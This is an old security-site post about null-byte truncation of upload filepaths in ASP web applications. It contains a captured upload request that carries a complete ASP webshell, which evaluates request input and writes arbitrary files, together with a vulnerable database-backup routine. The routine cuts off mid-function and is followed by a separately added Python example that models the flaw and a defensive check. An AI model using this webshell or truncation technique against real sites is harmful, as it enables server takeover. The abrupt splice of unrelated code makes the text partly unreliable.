Upload vulnerability: filepath variable \00 truncation - vulnerability warning - the black bar safety net

2011-10-26T00:00:00
ID MYHACK58:62201132148
Type myhack58
Reporter Anonymous
Modified 2011-10-26T00:00:00

Description

POST /coin/upload.asp?action=upfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer:

Recently phpwind had a vulnerability; Diamondback kept wanting to use the local include to get a shell and found that, with magic_quotes off, %00 truncates the string, so the included file can be whatever variable we want. But today's topic is not that one; it is the very classic \00 truncation of the upload filepath, which gives control over the file suffix.

Here is the packet captured during the upload:

upload/2010/2/201002232155064073.gif
-----------------------------7d9138191ce08bc
Content-Disposition: form-data; name="valcode"

6918
-----------------------------7d9138191ce08bc
Content-Disposition: form-data; name="file_name1"; filename="D:\hacker\xiaoma.gif"
Content-Type: text/plain

<%eval request("#")%>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fso=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=70 rows=30 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
-----------------------------7d9138191ce08bc
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d9138191ce08bc--

If nothing goes wrong, the upload succeeds and we get our webshell.

In practice we often run into a class of admin backends that offer a database backup function, but the backup tacks a .mdb suffix onto the end of the file name for you, as in the following code:

sub backupdata()
Dbpath=request.form("Dbpath")
Dbpath=server.mappath(Dbpath)
bkfolder=request.form("bkfolder")
bkdbname=request.form("bkdbname")
Set Fso=server.createobject("scripting.filesystemobject")
if fso.fileexists(dbpath) then
If CheckDir(bkfolder) = True Then
response.write bkfolder & "\" & bkdbname & ".mdb" ' I print it out here so it is easier to see
fso.copyfile dbpath, bkfolder & "\" & bkdbname & ".mdb"
else
MakeNewsDir bkfolder
fso.copyfile dbpath, bkfolder & "\" & bkdbname & ".mdb"
end if
response.write "database backup is complete, do the other operation! To establish the use of FTP tools to backup databases to ensure data security"
else
response.write "can't find your needed backup files!"
end if
end sub

Function CheckDir(FolderPath)
folderpath=Server.MapPath(".") & "\" & folderpath
Set fso1 = CreateObject("Scripting.FileSystemObject")
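An added example in Python, not code from the article: it models the two patterns discussed above (a suffix check on a filepath that a NUL-terminated file API will later truncate, and a backup routine that appends .mdb after the user-supplied name) and shows the validation a defender would apply instead. The extension allow-list and the validate_upload_path policy are assumptions.

```python
import posixpath
import re

# Hypothetical policy: the extensions this upload handler is meant to accept.
ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}

def effective_path(path):
    """The path a NUL-terminated (C-string style) file API actually operates on."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]

def naive_suffix_ok(path):
    """The check the vulnerable handler effectively makes: it judges the whole string."""
    return posixpath.splitext(path)[1].lower() in ALLOWED_EXT

def backup_name(bkdbname):
    """Same shape as the backup routine above: '.mdb' is appended after the user's name."""
    return bkdbname + ".mdb"

def validate_upload_path(path):
    """Defender-side check: refuse control bytes and traversal outright, then test the
    extension of the name that will really reach the filesystem. Returns (ok, reason)."""
    if any(ord(c) < 0x20 for c in path):
        return False, "control byte in path"
    if "\\" in path or ".." in path.split("/"):
        return False, "path traversal"
    name = posixpath.basename(path)
    if not re.fullmatch(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+", name):
        return False, "bad characters in file name"
    if posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        return False, "extension not allowed"
    return True, "ok"

if __name__ == "__main__":
    # Constructed sample: the suffix check passes, the file actually written ends in .asp.
    sample = "upload/2010/2/xiaoma.asp\x00.gif"
    print("naive check:", naive_suffix_ok(sample))
    print("file actually created:", effective_path(sample))
    print("hardened check:", validate_upload_path(sample))
    print("backup actually created:", effective_path(backup_name("data.asp\x00")))
```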
